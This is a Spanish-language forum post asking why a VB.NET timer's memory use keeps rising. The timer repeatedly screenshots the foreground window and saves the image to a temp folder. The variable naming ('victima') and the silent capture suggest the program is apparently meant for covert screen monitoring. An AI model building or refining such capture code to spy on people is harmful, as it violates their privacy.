Estoy en medio de un prorgamita y en el tengo un timer que es tal que asi
Código:
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
If IsWindowVisible(GetForegroundWindow()) And statuswindow = False Then
Dim rct As RECT
Dim victima As Long = GetForegroundWindow()
GetWindowRect(GetForegroundWindow(), rct)
Dim bmpScreenshot As Bitmap = New Bitmap(rct.Right - rct.Left, rct.Bottom - rct.Top, PixelFormat.Format24bppRgb)
Dim gfxScreenshot As Graphics = Graphics.FromImage(bmpScreenshot)
gfxScreenshot.CopyFromScreen(rct.Left, rct.Top, 0, 0, New Size(rct.Right - rct.Left, rct.Bottom - rct.Top), CopyPixelOperation.SourceCopy)
Try
bmpScreenshot.Save(sTempFolderPath & victima & ".png")
Catch ex As Exception
End Try
End If
End Sub
y el tio no hace mas que acaparar mas y mas ram a cada ciclo que es ejecutado y cuando el asunto empieza a ser mosquenate el solito se vacia y vuelve a ir subiendo
veis algo que pueda hacer para que no esté ahi subiendo y bajando la ram?